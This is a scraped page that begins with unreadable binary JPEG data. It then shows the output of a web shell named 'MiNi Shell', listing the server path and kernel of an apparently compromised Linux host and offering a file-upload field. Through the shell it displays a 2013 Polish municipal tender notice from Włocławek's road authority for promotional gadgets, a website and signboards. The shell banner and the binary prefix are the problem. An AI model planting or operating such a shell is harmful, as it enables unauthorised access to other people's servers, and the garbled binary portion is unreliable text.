JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131003/401910-N-2013.html

<p class="kh_header"><b>Włocławek: Przeprowadzenie działań promocyjnych dla zadania inwestycyjnego  pn.: Przebudowa drogi krajowej nr 1 w granicach administracyjnych miasta Włocławek - IV etap</b><br>
<b>Numer ogłoszenia: 401910 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie działań promocyjnych dla zadania inwestycyjnego  pn.: Przebudowa drogi krajowej nr 1 w granicach administracyjnych miasta Włocławek - IV etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje:
a) wykonanie i dostarczenie materiałów promujących projekt do siedziby zamawiającego (wraz z rozładunkiem i załadunkiem), w tym:
- 250 szt. breloczków w kształcie samochodu ciężarowego typu TIR z obracanymi kołami samochodu (kolor srebrny, wymiary min 70x25 x6 mm, materiał metal, znakowanie grawer, powierzchnia znakowania min. 50x15 mm, do każdego breloka opakowanie tekturowe pudełko prezentowe czarne od wewnątrz wyścielone czarnym materiałem),
- 200 szt. długopisów metalowych z satynowym połyskiem z metalowym klipem oraz gumowym uchwytem ułatwiającym pisanie, z wkładem niebiesko- lub czarno-piszącym (kolor długopisów srebrny lub czarny lub niebieski, wymiary min. 138x10 mm, materiał metal, znakowanie grawer z dwóch stron, powierzchnia znakowania min 65x6 mm x 2 strony
- 150 szt. teczek na dokumenty formatu A4, kartonowych z gumką (kolor projekt indywidualny, wymiary teczki po rozłożeniu min 458x321 mm, grzbiet bigowany o szerokości min. 6 mm, prawa wewnętrzna strona zaopatrzona w dwie poziome zakładki - górną i dolną oraz jedną pionową o długości min. 321 mm, nadruk kolorowy jednostronny, materiał sztywny błyszczący),
- 350 szt. pamięci USB flash driver w metalowej obudowie z satynowym połyskiem oraz z metalowym uchwytem na smycz, pojemność min. 8 GB, minimalna prędkość odczytu 100 MB/s oraz minimalna prędkość zapisu 50 MB/s, znakowanie grawer laserowy.
Wszystkie ww. materiały muszą zostać oznaczone zgodnie obecnie obowiązującymi zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (www.pois.gov.pl).
Zamawiający wymaga, by zaoferowane materiały promocyjne były nowe, pełnowartościowe, dobrej jakości, a także charakteryzowały się wysoką estetyką oraz starannością wykonania.
Wszystkie gadżety powinny być starannie opakowane i zabezpieczone przed uszkodzeniem na czas transportu i podczas składowania w siedzibie Zamawiającego. Jako opakowanie zbiorcze dla każdego z rodzaju zamawianego asortymentu wymagany jest karton z umieszczoną informacją o przedmiocie zamówienia i jego ilości umieszczonej wewnątrz kartonu.
Wykonanie i dostawa do siedziby Zamawiającego gadżetów promocyjnych ma nastąpić w ciągu 60 dni od daty wydania pisemnego polecenia przez Zamawiającego. Zamówienie będzie realizowane po wcześniejszym uzgodnieniu z Zamawiającym terminu dostawy.

b) publikację 4 artykułów prasowych promujących projekt p.n.: Przebudowa drogi krajowej nr 1 w granicach administracyjnych Miasta Włocławek w prasie o zasięgu co najmniej regionalnym obejmującym miasto Włocławek o nakładzie nie mniejszym niż 30.000 egzemplarzy. Minimalna powierzchnia nadruku szerokość 124 mm wysokość 83 mm, pełen kolor, projekt indywidualny.
Wszystkie ww. publikacje muszą zostać oznaczone zgodnie z obecnie obowiązującymi zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (www.pois.gov.pl).
Opracowanie i zamieszczenie artykułu w prasie raz na kwartał.

c)utworzenie strony internetowej www.
Założenia dla strony www:
Zarządzanie treścią ma odbywać się za pomocą systemu CMS, interfejsu oraz puli użytkowników. Całość systemu powinna posiadać kilka głównych elementów (modułów) umożliwiających zarządzanie informacją na stronie.
Elementy systemu (moduły) można scharakteryzować w następujący sposób:
- Portal internetowy - moduł odpowiedzialny za publikację części informacyjnych i opisowych,
- Mapa serwisu - mapa wszystkich odnośników do podstron serwisu,
- Wyszukiwarka www - podłączenie wyszukiwarki w serwisie
Założenia edycji stron portalu
System zarządzania treścią portalu www powinien posiadać następujące cechy:
- możliwość dodawania i usuwania podstron w portalu,
- możliwość tworzenia i edycji stron portalu z uwzględnieniem:
- formatowania tekstu stron bez konieczności stosowania znaczników HTLM, w trybie WYSIWYG (pogrubienie, kursywa, podkreślenie, indeks górny, indeks dolny, wyrównanie do lewej, wyrównanie do prawej, wycentrowanie, wyjustowanie, formatowanie przy użyciu zdefiniowanych styli, zmiana kroju pisma, możliwość przypisania listy numerowanej, wypunktowania numerycznego, możliwość przypisania list, możliwość dokonywania wcięć w tekście),
- możliwość wykonywania operacji kopiuj, wklej, wytnij umożliwiających wymianę treści z edytorami tekstowymi,
- wstawianie belki rozdzielczej,
- wstawianie odnośnika do innej podstrony portalu lub innej strony internetowej,
- wstawianie grafiki z możliwością edycji (doboru jej wielkości, wyrównania, obramowania, kadrowania, zmiany rozmiaru),
- wstawianie tabeli z możliwością edycji (ustalenia liczby kolumn i wierszy, ustalenia rozmiaru w pikselach lub procentach szerokości strony, ułożenie tekstu w komórkach, ustalenia marginesów i odstępów, ustalenia ramek dookoła, krawędzi oraz typu obramowania),
- możliwość publikacji krótkich treści w dziale aktualności,
- aktualność składać powinna się z:
- tytułu wiadomości/artykułu,
- zajawki,
- zdjęcie/grafika do newsów, jako ilustracja wiadomości (na stronie głównej obok streszczenia wiadomości),
- treści głównej,
- kategorii,
- grafiki/zdjęcia/galerii,
- załączników do informacji,
- daty publikacji.

Założenia publikacji galerii zdjęć w portalu:
Możliwość dodawania do każdej z podstron oraz aktualności portalu galerii fotograficznej. Galeria powinna mieć możliwość umieszczenia w niej tytułu galerii oraz krótkiego opisu - czego dotyczy. W każdej z galerii możliwość dodania grafiki/zdjęcia (liczba grafik bez ograniczenia). Możliwość wskazania kilku plików graficznych na dysku jednocześnie podczas ich uploadu na serwer. Uploadowanie grafiki powinny być automatycznie przeskalowane do żądanych rozmiarów. Każda z grafik powinna posiadać możliwość opisania za pomocą nazwy.
 
Założenia publikacji załączników portalu:
Strony portalu powinny posiadać możliwość dołączenia załączników (dokumentów do pobrania przez internautę). Po dodaniu do strony załącznika powinna być możliwość opisania go - tytuł załącznika do pobrania.
Po kliknięciu na tytuł załącznika internauta będzie mógł pobrać go na swój komputer lub bezpośrednio otworzyć. W portalu ma znajdować się osobny dział z załącznikami skategoryzowanymi według kryteriów określonych przez administratora.
Strona musi zachowywać swą funkcjonalność do 31 grudnia 2014 roku.
Strona musi posiadać funkcję bezpośredniego przekierowania w formie zakładki na oficjalnej stronie internetowej Urzędu Miasta Włocławek oraz Miejskiego Zarządu Dróg we Włocławku.

Strona musi zostać oznaczona zgodnie z obecnie obowiązującymi zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (www.pois.gov.pl).

Utworzenie strony internetowej ma nastąpić w ciągu 30 dni od daty wydania pisemnego polecenia przez Zamawiającego.

d)Wykonanie, dostawa i montaż 2 tablic informacyjnych.
Wymiary tablic 3000 (szerokość) x 2000mm (wysokość) wykonane z blachy ocynkowanej lub z równoważnego materiału, tzn. odpornego na działanie warunków atmosferycznych.
Nadruk jednostronny foliowany.
Wszystkie znaki i napisy w pełnym kolorze.
Dane wejściowe do zamieszczenia na tablicy, tj. wartość projektu i kwotę dofinansowania, nazwa beneficjenta oraz nazwa projektu, informację o współfinansowaniu ze środków unii Europejskiej - zostaną przekazane przez Zamawiającego.
Projekt należy przedłożyć Zamawiającemu do akceptacji.
Konstrukcja stalowa, zabezpieczenie antykorozyjne, wpuszczana w grunt, odpowiedni fundament.
Miejsce gdzie zostaną zamontowane tablice pamiątkowe wskaże Zamawiający.
Tablice muszą zostać oznaczone zgodnie z zgodnie z obecnie obowiązującymi zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (www.pois.gov.pl).
Wykonanie oraz montaż tablic informacyjnych ma nastąpić w ciągu 30 dni od wydania pisemnego polecenia przez Zamawiającego. Zamówienie będzie realizowane po wcześniejszym uzgodnieniu z Zamawiającym terminu dostawy. W okresie trwania projektu na wykonawcy spoczywał będzie obowiązek aktualizowania kwot dofinansowania (należy przewidzieć nie więcej niż 4 aktualizacje). Aktualizacja nastąpi w ciągu 14 dni od daty przekazania aktualnych kwot oraz wydania pisemnego polecenia przez Zamawiającego.

e) Wykonanie, dostawa i montaż 2 tablic pamiątkowych
Wymiary tablic 1000 (szerokość) x 700 mm (wysokość) wykonane z blachy ocynkowanej lub z równoważnego materiału, tzn. odpornego na działanie warunków atmosferycznych.
Nadruk jednostronny foliowany.
Wszystkie znaki i napisy w pełnym kolorze.
Dane wejściowe do zamieszczenia na tablicy, tj. kwoty oraz nazwa projektu - zostaną przekazane przez Zamawiającego.
Projekt należy przedłożyć Zamawiającemu do akceptacji.
Konstrukcja stalowa, zabezpieczenie antykorozyjne, wpuszczana w grunt, odpowiedni fundament.
Miejsce gdzie zostaną zamontowane tablice pamiątkowe wskaże Zamawiający.
Tablice muszą zostać oznaczone zgodnie z zgodnie z obecnie obowiązującymi zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (www.pois.gov.pl).
Wykonanie oraz montaż tablic pamiątkowych ma nastąpić w ciągu 15 dni od daty wydania pisemnego polecenia przez Zamawiającego. Zamówienie będzie realizowane po wcześniejszym uzgodnieniu z Zamawiającym terminu dostawy.
Przed przystąpieniem do realizacji przedmiotu umowy Wykonawca przedstawi Zamawiającemu do akceptacji próbny egzemplarz pokazowy każdego materiału promocyjnego będącego przedmiotem zamówienia.
Akceptacja wzorów zostanie pisemnie potwierdzona przez Zamawiającego.
Liczba materiałów promocyjnych nie zostanie pomniejszona o egzemplarze pokazowe (próbki) dostarczone do chwili ostatecznej akceptacji gotowego do produkcji przedmiotu zamówienia.
Materiały promocyjne dostarczone w ramach umowy będą wykonane zgodnie z zaakceptowanymi przez Zamawiającego wzorami (próbkami).
Zamawiający wymaga, aby Wykonawca dostarczył wszelkie gadżety do siedziby Zamawiającego (wraz z załadunkiem i rozładunkiem w pomieszczeniu wskazanym przez Zamawiającego)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.22.00-5, 22.46.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta powinna być zabezpieczona wadium w wysokości 1 000 zł (słownie: jeden tysiąc złotych 00/100)
2. Wadium może być wniesione w:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z roku 2007 Nr 42, poz.275, z późn, zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1 Wykonawca winien w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonać, a w przypadku świadczeń okresowych lub ciągłych, wykonywać co najmniej: jedną usługę polegającą na przeprowadzeniu działań promocyjnych w kwocie min. 20 000 zł brutto,
2.2. W celu oceny spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 i zweryfikowania zdolności wykonawcy do należytego wykonania udzielonego zamówienia w opisie jak powyżej, należy załączyć:
a) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane należycie;
oraz
e) dowody, że usługi określone w pkt IV.I.2.1. siwz oraz zgodnie z treścią zał. 5 zostały  lub są należycie wykonywane</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1 Formularz ofertowy, pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrębnych dokumentów np. z odpisu z rejestru.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie postanowienia, które zostaną wprowadzone do treści umowy oraz wysokość kar   umownych z tytułu niewykonania lub nienależytego wykonania umowy zawarte są we wzorze umowy stanowiącym załącznik nr 2 do niniejszej specyfikacji istotnych warunków zamówienia.
2. Zamawiający dopuszcza jednak możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku  niemożliwości spełnienia świadczenia z przyczyn obiektywnych, np. wycofanie danego asortymentu
 z produkcji. lub zmian w liczbie dostarczonych poszczególnych materiałów promocyjnych.
3. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej 
i podpisania przez obie strony.
4. Wszelkie zmiany do umowy mogą być wprowadzone w okolicznościach i na zasadach  jak powyżej, wyłącznie przed zakończeniem terminu realizacji umowy.
5. Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdwloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2013 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com